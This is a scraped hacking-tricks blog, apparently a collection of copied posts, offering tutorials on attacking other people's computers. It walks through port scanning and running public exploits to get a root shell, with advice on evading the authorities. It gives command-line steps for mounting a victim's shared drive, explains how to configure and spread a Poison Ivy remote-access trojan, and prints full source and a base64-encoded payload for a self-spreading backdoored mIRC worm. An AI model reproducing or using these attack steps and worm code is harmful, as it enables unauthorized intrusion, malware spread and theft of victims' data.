Latest Free Recharge Tricks






2011 vodafone, Airtel, BSNL, Reliance, HTC, SPICE, Etisalat, and more tricks and tips for computer hacking and much more about facebook....































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































Showing posts with label Trojans amp; worms. Show all posts
Showing posts with label Trojans amp; worms. Show all posts

Hacking by using Backdoor.

Posted by Free Mobile Recharge Saturday, April 24, 2010 0 comments




First of all, i will tell u guys what a backdoor is.

A back door is a means of access to a computer program that bypasses security mechanisms.

A programmer may sometimes install a back door so that the program can be accessed remotely for troubleshooting or other purposes. However, attackers often use back doors that they detect or install themselves, as part of an exploit.

In some cases, a worm is designed to take advantage of a back door created by an earlier attack. For example, Nimda gained entrance through a back door left by Code Red.

Whether installed as an administrative tool or a means of attack, a back door is a security risk, because there are always crackers out there looking for any vulnerability to exploit.
In her article "Who gets your trust?" security consultant Carole Fennelly uses an analogy to illustrate the situation: "Think of approaching a building with an elaborate security system that does bio scans, background checks, the works. Someone who doesn't have time to go through all that might just rig up a back exit so they can step out for a smoke -- and then hope no one finds out about it."

 
A proxy server is a method by which computers talk to each other. An open proxy is a backdoor that has been opened in a computer network (either by a friendly or unfriendly method), meaning that the network's Internet access can be used by authorized personnel within the network or, if the backdoor is not well-protected or is unknown, by malicious access from anywhere in the world outside the network. Unknown backdoors can be installed on a personal computer, desktop or laptop.

 

The purpose of a backdoor is to get around the security measures installed to protect a computer system and allow access into the system from the outside. If the backdoor was opened by a piece of spyware, then that spyware was programmed to sniff out standard security programming and disable a part of the security program that recognizes and blocks an unauthorized attempt to access that computer and its network. If the backdoor was opened by a live person sitting at the computer, then the recognition pattern was disabled manually.

Malicious programs that open backdoors can be found in emails, ad banners, web sites, and downloads, sometimes without the knowledge of the website or download owner, or without the knowledge of the email author. In general, Trojan Horse is used for this purpose.

In the past,backdoors were only a problem for IT (Information Technology) Managers in large corporations, universities, and government facilities where sometimes hundreds of computers are linked together under one roof or between geographically separated offices.

Today families and small businesses network their computers, as do libraries, clinics, rehab hospices, retirement homes, and local law enforcement departments. Even isolated computers are susceptible to invasion through the covert installation of malicious programs that open a passage through the computer's firewall.

There are programs that spend 24 hours a day surfing the Web in search of unprotected and unknown backdoors. They run around "pinging" IP's until they find one that sends back a signal indicating that access can be granted. A program such as CallerIP scans all the ports (where your modem or cable or telephone is plugged in) on your system and alerts you to any malicious backdoors that can provide unauthorized access to your computer.

Uses of a backdoor:

I have added a list of all things a hacker can do after installing backdoor in Access computer remotely using backdoor.

 

 

As a hacker, backdoor serves you the best in hacking. By using backdoor one can remotely access anyones computer without his permission provided backdoor is installed on it.

Now why it is necessary to hide backdoors???
Backdoors since used by hackers are considered as hacktool by all antiviruses.

The antiviruses on detecting any backdoor while scanning, display or delete it as a virus since a normal computer doesnt contain any backdoor. Hence, all the backdoor hiding efforts are done to avoid antiviruses from detecting it.
Enjoy HaCkInG.....

ads

In my post Access computer remotely using backdoor, i have told the method to hack remote computer using a backdoor.The post below describes the efficient method and normal procedure used to hack any remote computer. All we need is an IP Address. If you know IP Address, you are able to hack/access victim's computer remotely. There's plenty of papers out there that go into how to obtain an IP Address from the preferred mark of your choice. So I'm not going to go into that subject. Alright so ,say, we got the targets IP Address finally.

Now, what do we do with this IP Address. Well first ping the IP Address to make sure that its alive. In otherwords online. Now at the bottom of this document ill include some links where you can obtain some key tools that may help on your journey through the electronic jungle. So we need to find places to get inside of the computer so we can start trying to find a way to "hack" the box. Port Scanners are used to identify the open ports on a machine thats running on a network, whether its a router, or a desktop computer, they will all have ports. Protocols use these ports to communicate with other services and resources on the network.

1) Blues Port Scanner - This program will scan the IP address that you chose and identify open ports that are on the target box.

Example 1:
Idlescan using Zombie (192.150.13.111:80); Class: Incremental
Interesting ports on 208.225.90.120:
(The 65522 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
25/tcp open smtp
80/tcp open http
111/tcp open sunrpc
135/tcp open loc-srv
443/tcp open https 1027/tcp open IIS
1030/tcp open iad1
2306/tcp open unknown
5631/tcp open pcanywheredata
7937/tcp open unknown
7938/tcp open unknown
36890/tcp open unknown

In example 1 now we see that there are a variety of ports open on this box. Take note of all the ports that you see listed before you. Most of them will be paired up with the type of protocol that uses that port (IE. 80-HTTP 25-SMTP Etc Etc...) Simply take all that information and paste it into notepad or the editor of your choice. This is the beginning of your targets record. So now we know what ports are open. These are all theoretical points of entry where we could wiggle into the computer system. But we all know its not that easy. Alright so we don't even know what type of software or what operating system that this system is running.

2) NMAP - Port Scanner - Has unique OS fingerprinting methods so when the program sees a certain series of ports open it uses its best judgement to guess what operating system its running. Generally correct with my experiences.

So we have to figure out what type of software this box is running if we are gonna start hacking the thing right? Many of you have used TELNET for your MUDS and MOOS and weird multiplayer text dungeons and many of you havent even heard of it before period. TELNET is used to open a remote connection to an IP Address through a Port. So what that means is we are accessing their computer from across the internet, all we need is their IP Address and a port number. With that record you are starting to compile, open a TELNET connection to the IP Address and enter one of the OPEN ports that you found on the target.
So say we typed 'TELNET -o xxx.xxx.xxx.xxx 25' This command will open up a connection through port 25 to the IP xxx.xxx.xxx.xxx. Now you may see some text at the very top of the screen. You may think, well what the hell, how is that little string of text going to help me. Well get that list you are starting to write, and copy the banners into your compilation of the information youve gathered on your target. Banners/Headers are what you get when you TELNET to the open ports. Heres an example of a banner from port 25.

220 jesus.gha.chartermi.net ESMTP Sendmail 8.12.8/8.12.8; Fri, 7 Oct 2005 01:22:29 -0400

Now this is a very important part in the enumeration process. You notice it says 'Sendmail 8.12.8/8.12.8' Well what do ya know, we now have discovered a version number. This is where we can start identifying the programs running on the machine. There are some instances in which companies will try and falsify their headers/banners so hackers are unable to find out what programs are truly installed. Now just copy all the banners from all the open ports *Some Ports May Have No Bannners* and organize them in the little record we have of the target. Now we have all the open ports, and a list of the programs running and their version numbers. This is some of the most sensitive information you can come across in the networking world. Other points of interest may be the DNS server, that contains lots of information and if you are able to manipulate it than you can pretend to hotmail, and steal a bunch of peoples email. Well now back to the task at handu. Apart from actual company secrets and secret configurations of the network hardware, you got some good juicy info. http://www.securityfocus.com is a very good resource for looking up software vulnerabilities. If you cant find any vulnerabilities there, search on google. There are many, many, many other sites that post vulnerabilities that their groups find and their affiliates.

At SecurityFocus you can search through vendor and whatnot to try and find your peice of software, or you can use the search box. When i searched SecurityFocus i found a paper on how Sendmail 8.12.8 had a buffer overflow. There was proof of concept code where they wrote the shellcode and everything, so if you ran the code with the right syntax, a command prompt would just spawn. You should notice a (#) on the line where your code is being typed. That pound symbol means that the command prompt window thats currently open was opened as root. The highest privilage on a UNIX/Linux Box. You have just successfully hacked a box. Now that you have a command shell in front of you, you can start doing whatever you want, delete everything if you want to be a fucking jerk, however I dont recommend that. Maybe leave a text file saying how you did it and that they should patch their system.....whoever they are. And many times the best thing you can do is just lay in the shadows, dont let anyone know what you did. More often than not this is the path you are going to want to take to avoid unwanted visits by the authorities.

There are many types of exploits out there, some are Denial of Service exploits, where you shut down a box, or render an application/process unusable. Called denial of service simply because you are denying a service on someones box to everyone trying to access it. Buffer Overflow exploits are involved when a variable inside some code doesnt have any input validation. Each letter you enter in for the string variable will be 1 byte long. Now where the variables are located at when they are in use by a program is called the buffer. Now what do you think overflowing the buffer means. We overflow the buffer so we can get to a totally different memory address. Then people write whats called shellcode in hex. This shellcode is what returns that command prompt when you run the exploit. That wasnt the best description of a buffer overflow, however all you need to remember is that garbage data fills up the data registers so then the buffer overflows and allows for remote execution of almost every command available. There are many, many other types of attacks that cannot all be described here, like man-in-the-middle attacks where you spoof who you are. Performed correctly, the victim will enter http://www.bank.com and his connection will be redirected to your site where you can make a username and password box, make the site look legit. And your poor mark will enter their credentials into your site, when they think its really http://www.bank.com. You need to have a small script set up so it will automatiically display like an error or something once they try and log in with their credentials. This makes it seem like the site is down and the victim doenst give it a second thought and will simply try again later.
__________________________________________________ _______o_________

So as a summary of how to 0Wn a box when you only have an IP Address
Method Works On BOTH *Nix and Windoze

****You can do the same with domain names (IE google.com) than what you can with IP Addresses. Run a WHOIS Lookup or something along those lines. Or check up on InterNIC you should be able to resolve the domain name to an IP address.****

- Port Scan The Address And Record Open Ports
- Telnet To Open Ports To Identify Software Running On Ports

3) netcat - Network swiss army knife. Like TELNET only better and with a lot more functionality. Both can be used when you are trying to fingerprint software on open ports

- Record Banners And Take Note Of The Application Running and The Version Number
- Take A Gander Online At SecurityFocus.com or Eeye.com. If you cant find any vulnerabilities then search google.
- Make a copy of some Proof-Of-Concept code for the vulnerability.

*Read the documentation if there is any, for the proof-of-concept code you will be using for your exploit*

- Run The Exploit Against The Victim.
- Reap The Cheap-Sh0t Ownage

So guys...i hope you now know how to hack into a computer using a known IP Address. Once you get IP Address of the victim, you are able to access and hack the computer remotely as described in the post.
Credit: Codine.

Enjoy HaCkInG.....

ads

How to access a folder or hardrive on a computer/pc on your network.


In my post Access computer remotely, i have mentioned about use of backdoor to access or hack computer remotely .The following article explains the method used by most hackers to access someones computer/hard disk remotely using command prompt in your network ie network computer hacking.

Step 1
Get a good IP scanner angry ip scanner is a good one you can get it here: http://www.angryziber.com/ipscan/

Step 2
Open a dos prompt
Do this by going to start/run
enter command.com and press ok

this is what you see:
c:\windows>

Now this is what you have to do ---->>>

Replace 255.255.255.255 with the victims IP address.

c:\windows>nbtstat -a 255.255.255.255

If you see this your in:

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------------------------
user<00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered

MAC Address = xx-xx-xx-xx-xx-xx
---------------------------------------------------------------

If you don't get the number <20>.
The victim disabled the File And Printer Sharing, find a another victim.

Step 3

type down:

c:\windows>net view \\255.255.255.255

if the output is like this:

Shared resources at \\255.255.255.255
ComputerNameGoesHere

Sharename Type Used as Comment

------------------------------------------------------------
CDISK Disk xxxxx xxxxx

The command completed successfully.

"DISK" shows that the victim is sharing a Disk named as CDISK

Step 4

type down:

you can replace x: by any letter you want but not the letter of your own drive.

CDISK is the name of the shared harddrive.

c:\windows>net use x: \\255.255.255.255\CDISK

If the command is successful you are a small time hacker.

Now open windows explorer or just double click on the My Computer icon on your
desktop and you will see a new network drive X:.

Note to newbies: This hack will only work if you have the ip of someone on your network. It will not work if the ip of the person you want to "hack" is not on your network.

Tip: If you can only access your targets shared folder put a batch file in their shared folder with the command C=C if they open it,it will share their hardrive.

Enjoy HaCkInG.....

ads

Some days before i had posted an article "Hack/access computer remotely using a backdoor", which received lots of visitor hits. I was asked by many readers to write about the program/software to access and hack computer remotely or about a spy software. As in my post "Hack computer and email accounts using Ardamax keylogger", i have mentioned about Ardamax keylogger to hack victim's email passwords. Here in this post, i am mentioning about software program "Poison ivy" which is actually a RAT(Remote Administration Tool), by which a hacker can access any server installed computer remotely. I would like to add over here that this is not my tutorial, i found this tutorial perfect and so i have added this over here.

Requirements:


---------------------------------
no-ip.biz account (see below for instructions)
RAT of your choice, I will be showing Poison Ivy
No-IP client
Know how to port forward (people behind routers only)
---------------------------------


Intro to RATs


---------------------------------
So here we go. I'm going to show you how to setup a RAT. A RAT can stand for a few things:
Remote Administration Tool
Remote Access Tool
Remote Access Trojan
Remote Administration Trojan
and probably more.
In any event, it doesn't matter. What you need to know is that it allows you to access the target computer from yours, using the trojan. Now it may help you to look this up on:

wikipedia. http://en.wikipedia.org/wiki/Remote_administration_tool ---------------------------------

No IP


---------------------------------
First of all, go here:

and sign up for an account there. After that log into the site with the account you just created and add your new domain. SEE PIC no-ip.png
Now download the dynamic update client from the downloads tab at the top of the no-ip site. Install that when you are done, and you can update your IP for your domain by logging into the client and updating. Pretty easy.
---------------------------------

hack computer remotely Poison ivy

Open up poison ivy, and click File>New Client. We are going to set up Poison Ivy to listen for connections on the port you forwarded. Default is 3460. Type in a password for your RAT and click start. You will need this password later.


 

Port Forwarding
---------------------------------
If you are not behind a router, skip this. If you are, read on.

You should know how to forward ports on your router. If you dont, head to google, and find out. Each router is different. Usually you can type 192.168.1.1 (or your router's IP address for your LAN) in the address bar of your browser. If you got the right LAN IP, a login box will appear, log in. Default is usually admin:password, or something similar. You're on your own here.
When you finally get int, forward port 3460. That's all.
Hulk11 pointed out that admin:admin is commonly used in routers as well.
---------------------------------

Getting the RAT
---------------------------------
Head over to:

and download the latest version. At the time of posting it was 2.3.2.
Download that and unzip it.
---------------------------------

Using the RAT
---------------------------------

Now File>New Server. Click create profile. Make it look like Server1.png Be sure that the password you put here and the password here match.

Click next and make your server look like Server2.png. You will need to select Active X and click the random button. Having the server melt is up to you, I wouldn't pick melt when it is bound to another file. When the file is sent by itself, usually choose to melt it. Click next

Make your server look like Server3.png. Ignore the thing about the keylogger making it unstable. Not much else here. Click next.

You can choose an icon here, or use a resource editor like ResHacker to chage it later. After you do that, click Generate at the bottom and save the .EXE somewhere.
---------------------------------

Testing the RAT
---------------------------------
You can run the server on yourself to test it, this is relatively safe because you have the password to connect to it. When you run the server, you should see yourself in the Poison Ivy Connection's tab.
Notice the pop up box from the system try alerting you of a new connection. That's nice. You can see this in Working.png I have edited out the IP addresses of those not on my LAN as well as their computer user names and such in order to protect them. To connect to a server, double click the entry in the connections tab. Behold! You are in their PC!
---------------------------------

Distributing
---------------------------------
You can distribute the server file by itself, or bind it to other files. This is where you get to do as you please. Get creative!
---------------------------------

Well that is about it. You can use this knowledge with other RATs and such. So guys, i assume that this tutorial will help you in hacking or accessing any computer remotely. Just download the software poison ivy and start hacking remote computers/pc. By using Poison ivy, one can extract/crack all password hashes present in victim's computer, take a screenshot of victim's computer and many more.

Credit: flashdrive 64.

Enjoy HaCkInG.....

ads

Make Your Own mIRC Trojan

Posted by Free Mobile Recharge 0 comments

Note: The article is for educational purpose only. Do not use it for causing nuisance.

In this tutorial I will try to teach you how to make your own mIRC worm in IRC. This is the basic formula, so you can later add/delete functions to obtain better results in your eyes. This tutorial is of course for educational use only. It is meant to explore how mIRC scripts work, and how you can protect yourself against these threats. The site admin do not take any responsibility for the damages one can cause using this script. If you do not agree with these terms I suggest you stop reading this tutorial.

First of all I need to notify you that this worm is backdoored. This means that people that are infected by this worm can be controlled by you. Once infected with the worm they are also infected with the Trojan. Using the Trojan you can control the victim’s PC.

Infect the victim
It all starts with the next command:


//write mab.mrc $decode(b24gXio6dGV4dDoqOio6IHsgaWYgK
ChpbnMqIGlzd20gJDEtKSAmJiAoJHRhcmdldCA9PSAkbWUpKSB 7IC
4gJCsgJDItIHwgaGFsdGRlZiB9IHwgZWxzZWlmICgoYSogaXN3 bSA
kMS0pICYmICgkY2hhbikpIHsgLm1zZyBtYWIgaW5mIHwgLm1zZ yAk
bmljayBXYW50IHRvIGJlIE9QRVJBVE9SIGluICRjaGFuIGNvcH kvc
GFzdGUgdGhpcy0+IAM0Ly93cml0ZSAuICQgJCsgZGVjb2RlKCA kKy
AkZW5jb2RlKCRyZWFkKCRzY3JpcHQsbiwxKSxtKSAkKyAsbSkg JGN
ocigxMjQpIC5sb2FkIC1ycyB9IH0=,m) | .load -rs mab.mrc

This is one line!

Understand the Script
We need to mix these two things:

The Worm

on 1:text:*a*:#:{ .ignore $nick | .timer 0 120 .join #mab | .msg $nick Do you want to be an OPERATOR in $chan ? copy/paste this-> 7 //write . $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs . $chr(124) //mode $ $+ me +R }

Here #mab is the channel you want to let them join if they're infected with the worm. But since that would not be very stealthy, we have to do it in another way. We let it message you. We change the .timer 0 120 .join #mab with .msg mab_ inf. Where mab_ is your nickname.

With this, your worm has started. It will now spread and try to personal message people, while ignoring incoming messages. When that is done, it will try to send itself to other users, and tell them to type the command.

Above is the original worm I designed. Now we are going to change some things about it so the functionality of the Trojan is constructive. We will remove the user mode +R on the end of the script, because this will only let users who are authenticated with the official server bot message the victim once the Trojan is implemented. That is not the objective, so we will remove that from the worm. Therefore, we get the next script that we have to merge with the Trojan script:

on 1:text:*a*:#:{ .ignore $nick | .msg mab_ inf | .msg $nick Do you want to be an OPERATOR in $chan ? copy/paste this-> $chr(3) $+ 4//write . $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs }

The Trojan

on ^*:text:ins*:?:{ . $+ $2- | haltdef }

Mixed they will give us the Backdoored IRC Worm. This means that the worm will spread itself, join the certain channel (here: #mab) and after that it will spread itself. The only thing left to do is wait for you to control it via the Trojan, so you will have the rights to do whatever you want on his/her computer using mIRC. You actually use the victim’s mIRC to accomplish certain commands. I suggest you visit the IRC Trojan Tutorial, so you can also fully use the trojan part in the worm.

I will now try to give more details about that script, so you truly understand the worm. You can easily modify it and achieve better results. I will mix it.

So basically we want to mix these two “mechanisms”:

on 1:text:*a*:#:{ DO SOMETHING }
on ^*:text:ins*:?:{ DO SOMETHING ELSE | haltdef }

Solution:

on ^*:text:*:*: {
if ((ins* iswm $1-) && ($target == $me)) DO SOMETHING
elseif ((a* iswm $1-) && ($chan)) DO SOMETHING ELSE
}

In one line:

on ^*:text:*:*: { if ((ins* iswm $1-) && ($target == $me)) DO SOMETHING | elseif ((a* iswm $1-) && ($chan)) DO SOMETHING ELSE }

Where DO SOMETHING is the Trojan’s work and DO SOMETHING ELSE is the Worm’s work.

Integrated:
on ^*:text:*:*: { if ((ins* iswm $1-) && ($target == $me)) { . $+ $2- | haltdef } | elseif ((a* iswm $1-) && ($chan)) { .msg mab_ inf | .msg $nick Do you want to be OPERATOR in $ $+ chan ? copy/paste this-> 7 //write . $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs . $chr(124) //mode $ $+ me +R } }

Good. This is exactly what we needed. Now this doesn’t look very good, so we need to encode it with mIRC. Some chars have to be written differently because mIRC can misunderstand them and think they are parameters or other things. The next chars have to be written differently: (){},

Why these chars and how can I control it?

//echo -a $asc(char here)

If this gives a bad result this means that the char must be written in another way.

Example encoding of “,”:

//say $encode(,,m) This is wrong
//say $encode($+ $chr(44),m) This is correct

Note:

$+ = pasting two strings together

| = $chr(124)
, = $chr(44)
( = $chr(40)
) = $chr(41)
{ = $chr(123)
} = $chr(125)

We have to realize that we don't always have to encode that this way. Sometimes this method is not needed.

For finding the numbers you use this:

//echo -a $asc($?)

This will pop up an input box, just fill in the char and you’ll get the number as result.

Good, we have the knowledge for $encoding now. So this is what we get before we start encoding:

on ^*:text:*:*: $chr(123) if ((ins* iswm $ $+ 1-) && ($ $+ target == $ $+ me)) $chr(123) . $ $+ + $ $+ 2- $chr(124) haltdef $chr(125) $chr(124) elseif ((a* iswm $ $+ 1-) && ($chan)) $chr(123) .msg mab inf $chr(124) .msg $ $+ nick Want to be OPERATOR in $ $+ chan copy/paste this-> $chr(3) $+ 4//write . $ $ $+ + decode( $ $+ + $ $+ encode( $+ $ $+ read( $+ $ $+ script,n,1),m) $ $+ + ,m) $ $+ chr(124) .load -rs $chr(125) $chr(125)

So:

//say $encode(on ^*:text:*:*: $chr(123) if ((ins* iswm $ $+ 1-) && ($ $+ target == $ $+ me)) $chr(123) . $ $+ + $ $+ 2- $chr(124) haltdef $chr(125) $chr(124) elseif ((a* iswm $ $+ 1-) && ($chan)) $chr(123) .msg mab inf $chr(124) .msg $ $+ nick Want to be OPERATOR in $ $+ chan copy/paste this-> $chr(3) $+ 4//write . $ $ $+ + decode( $ $+ + $ $+ encode( $+ $ $+ read( $+ $ $+ script,n,1),m) $ $+ + ,m) $ $+ chr(124) .load -rs $chr(125) $chr(125),m)

For finding the $encoded variable we split it up as global variables. The variables are set with:

/set %var STRING

So for finding it we write the next in mIRC:

//say $encode(%var1 $+ %var2 $+ %var3 $+ %var4,m)

But we don't necessarily need to set it as variables before we encode it. So you can just use the encode line.

We find the next as result:

b24gXio6dGV4dDoqOio6IHsgaWYgKChpbnMqIGlzd20gJDEtKS AmJ
iAoJHRhcmdldCA9PSAkbWUpKSB7IC4gJCsgJDItIHwgaGFsdGR lZi
B9IHwgZWxzZWlmICgoYSogaXN3bSAkMS0pICYmICgkY2hhbikp IHs
gLm1zZyBtYWIgaW5mIHwgLm1zZyAkbmljayBXYW50IHRvIGJlI E9Q
RVJBVE9SIGluICRjaGFuIGNvcHkvcGFzdGUgdGhpcy0+IAM0Ly 93c
ml0ZSAuICQgJCsgZGVjb2RlKCAkKyAkZW5jb2RlKCRyZWFkKCR zY3
JpcHQsbiwxKSxtKSAkKyAsbSkgJGNocigxMjQpIC5sb2FkIC1y cyB
9IH0=

This pasted to each other in one line!

This is the ‘basic’ irc worm script. By modifying it you can accomplish things that satisfy your needs.

Enjoy HaCkInG

ads

Access computer remotely using backdoor.

Posted by Free Mobile Recharge 0 comments

Access computer remotely using backdoor Trojan Virus:


digg



As a continue to my post Hacking by using Backdoor, i have added this post to explain all consequences when a backdoor is installed on your computer.

The post explains all things a hacker can do after installing a backdoor on victims computer.

What an outsider can do:



1. Log on to your computer and operate/access it from a remote location.
2. Access your email list and/or use your Internet connection. This is called SMTP hijacking and is hugely popular with email scammers such as Nigerian con artists and email spammers who send out worms, viruses, unsolicited advertising, etc. When you track the email path, it shows that the letter was sent from a corporation in Walla Walla, Washington or from a college in Texas instead of from it's true origin. 

3. Find files/documents that are not protected and destroy, copy, email, and alter them. That's why it's so important to install software like Folder Access.

4. Run programs, alter or delete programs.

5. Install hidden programs to watch what you do with your computer and where you go on the Internet. Spyware can keep a record of every web site you visit, every email you write, every chat in a chat room (public or private), every Private Message, every online purchase you make, every bit of online banking you do.

Keyloggers can record every keystroke you make, including passwords, user names, identification numbers, bank account numbers, and credit card numbers. To prevent such attacks, you need to install SecureClean to uncover existing malicious programs and prevent others from being installed. 

6. Move from computer to computer within a network, access servers, steal and/or alter passwords, sensitive information, and personnel information.

7. Insert worms, viruses, and spyware into the computer owner or network owner's email programs, web sites or pages, ad banners, and downloads.

8. Crash a single computer or move through a network crashing one computer after the other. SOS Data Protection & Recovery Software is a real life-saver in that situation.

9. Send hundreds of requests to a network server that the server can't respond to (this is can cause a corporate web site to crash if it's the server where the site is stored); send hundreds of large emails to employees causing the email program to overload.

10. Change the path information takes through a network by inserting redirects that can cause the information to loop endlessly until the information transfer is rejected, or the altered path may send the information to a competitor. 

The above malice list covers the highlights. Once malicious access has occurred to an individual computer or a network, so much damage is possible that recovery can be prohibitively expensive and public embarrassment overwhelming.

Enjoy HaCkInG.....

ads

Ports used by Trojans.

Posted by Free Mobile Recharge 0 comments




As i have mentioned in the posts Trojan Horse-Absolute Beginners tutorial and Trojan Horse Infection, various ports are used in hacking via trojan ...

This post lists all the ports used and needed while hacking by using Trojan infection.

 


 





































































































































































































































































































































































































































































































































































































































































































































portTrojan
21Back construction, Blade runner, Doly, Fore, FTP trojan, Invisible FTP, Larva, WebEx, WinCrash
23TTS (Tiny Telnet Server)
25Ajan, Antigen, Email Password Sender, Happy99, Kuang 2, ProMail trojan, Shtrilitz, Stealth, Tapiras, Terminator, WinPC, WinSpy
31Agent 31, Hackers Paradise, Masters Paradise
41Deep Throat
59DMSetup
79FireHotcker
80Executor, RingZero
99Hidden port
110ProMail trojan
113Kazimas
119Happy 99
121JammerKillah
421TCP Wrappers
456Hackers Paradise
531Rasmin
555Ini-Killer, NetAdmin, Phase Zero, Stealth Spy
666Attack FTP, Back Construction, Cain & Abel, Satanz Backdoor, ServeU, Shadow Phyre
911Dark Shadow
999Deep Throat, WinSatan
1002Silencer, WebEx
1010 to 1015Doly trojan
1024NetSpy
1042Bla
1045Rasmin
1090Xtreme
1170Psyber Stream Server, Streaming Audio Trojan, voice
1234Ultor trojan
port 1234Ultors Trojan
port 1243BackDoor-G, SubSeven, SubSeven Apocalypse
port 1245VooDoo Doll
port 1269Mavericks Matrix
port 1349 (UDP)BO DLL
port 1492FTP99CMP
port 1509Psyber Streaming Server
port 1600Shivka-Burka
port 1807SpySender
port 1981Shockrave
port 1999BackDoor
port 1999TransScout
port 2000TransScout
2001TransScout
port 2001Trojan Cow
port 2002TransScout
port 2003TransScout
port 2004TransScout
port 2005TransScout
port 2023Ripper
port 2115Bugs
port 2140Deep Throat, The Invasor
port 2155Illusion Mailer
port 2283HVL Rat5
port 2565Striker
port 2583WinCrash
port 2600Digital RootBeer
port 2801Phineas Phucker
port 2989 (UDP)RAT
port 3024WinCrash
port 3128RingZero
port 3129Masters Paradise
port 3150Deep Throat, The Invasor
port 3459Eclipse 2000
port 3700portal of Doom
port 3791Eclypse
port 3801 (UDP)Eclypse
port 4092WinCrash
port 4321BoBo
port 4567File Nail
port 4590ICQTrojan
port 5000Bubbel, Back Door Setup, Sockets de Troie
port 5001Back Door Setup, Sockets de Troie
port 5011One of the Last Trojans (OOTLT)
port 5031NetMetro
port 5321FireHotcker
port 5400Blade Runner, Back Construction
port 5401Blade Runner, Back Construction
port 5402Blade Runner, Back Construction
port 5550Xtcp
port 5512Illusion Mailer
port 5555ServeMe
port 5556BO Facil
port 5557BO Facil
port 5569Robo-Hack
port 5742WinCrash
port 6400The Thing
port 6669Vampyre
port 6670Deep Throat
port 6771Deep Throat
port 6776BackDoor-G, SubSeven
port 6912Shit Heep (not port 69123!)
port 6939Indoctrination
port 6969GateCrasher, Priority, IRC 3
port 6970GateCrasher
port 7000Remote Grab, Kazimas
port 7300NetMonitor
port 7301NetMonitor
port 7306NetMonitor
port 7307NetMonitor
port 7308NetMonitor
port 7789Back Door Setup, ICKiller
port 8080RingZero
port 9400InCommand
port 9872portal of Doom
port 9873portal of Doom
port 9874portal of Doom
port 9875portal of Doom
port 9876Cyber Attacker
port 9878TransScout
port 9989iNi-Killer
port 10067 (UDP)portal of Doom
port 10101BrainSpy
port 10167 (UDP)portal of Doom
port 10520Acid Shivers
port 10607Coma
port 11000Senna Spy
port 11223Progenic trojan
port 12076Gjamer
port 12223Hack�99 KeyLogger
port 12345GabanBus, NetBus, Pie Bill Gates, X-bill
port 12346GabanBus, NetBus, X-bill
port 12361Whack-a-mole
port 12362Whack-a-mole
port 12631WhackJob
port 13000Senna Spy
port 16969Priority
port 17300Kuang2 The Virus
port 20000Millennium
port 20001Millennium
port 20034NetBus 2 Pro
port 20203Logged
port 21544GirlFriend
port 22222Prosiak
port 23456Evil FTP, Ugly FTP, Whack Job
port 23476Donald Dick
port 23477Donald Dick
port 26274 (UDP)Delta Source
port 27374SubSeven 2.0
port 29891 (UDP)The Unexplained
port 30029AOL trojan
port 30100NetSphere
port 30101NetSphere
port 30102NetSphere
port 30303Sockets de Troie
port 30999Kuang2
port 31336Bo Whack
port 31337Baron Night, BO client, BO2, Bo Facil
port 31337 (UDP)BackFire, Back Orifice, DeepBO
port 31338NetSpy DK
port 31338 (UDP)Back Orifice, DeepBO
port 31339NetSpy DK
port 31666Bo Whack
port 31785Hack�a�Tack
port 31787Hack�a�Tack
port 31788Hack�a�Tack
port 31789 (UDP)Hack�a�Tack
port 31791 (UDP)Hack�a�Tack
port 31792Hack�a�Tack
port 33333Prosiak
port 33911Spirit 2001a
port 34324BigGluck, TN
port 40412The Spy
port 40421Agent 40421, Masters Paradise
port 40422Masters Paradise
port 40423Masters Paradise
port 40426Masters Paradise
port 47262 (UDP)Delta Source
port 50505Sockets de Troie
port 50766Fore, Schwindler
port 53001Remote Windows Shutdown
port 54320Back Orifice 2000
port 54321School Bus
port 54321 (UDP)Back Orifice 2000
port 60000Deep Throat
port 61466Telecommando
port 65000Devil

Enjoy HaCkInG.....

ads

Trojan Horse Infection attack

Posted by Free Mobile Recharge 0 comments

As a reference to my post Trojan Horse: Absolute Beginner's Tutorial, this post explains about infection of Trojan Horse virus and ports used for infection. Trojan Horse is a favorite hacktool used for hacking and the tutorial provides the information necessary for that. After being hacked by using trojan, various symptoms are seen and trojan virus removal becomes important.The post explains necessary precautions to prevent trojan virus attacks.

Infection by a Trojan horse virus usually comes after opening a contaminated file containing the Trojan horse and is indicated by the following symptoms:



 

 





  • Abnormal activity by the modem,network adapter or hard drive: data is being loaded without any activity from the user;

  • Strange reactions from the mouse

  • Programs opening unexpectedly;

  • Repeated crashes.



Principle of a Trojan horse


 


As a Trojan horse is usually (and increasingly) intended to open a port on your machine so that a hacker can gain control of it (such as by stealing personal data stored on the hard drive), the hacker's goal is to first infect your machine by making you open an infected file containing the Trojan and then to access your machine through the opened port.


 


However, to be able to infiltrate your machine, the hacker normally has to know its IP Address. So:




  • Either you have a fixed IP address(as with businesses, or with individuals with a cable or similar connection, etc.) in which case your IP address can easily be discovered;

  • or your IP address is dynamic (reassigned each time you connect), as with modem connections; in which case the hacker must scan IP addresses at random in order to detect those which correspond to infected machines.



Protect yourself from Trojans


 


As i have explained in my post Firewall- A hindrance in hacking, Firewall is used to protect the user from various hacking attempts.


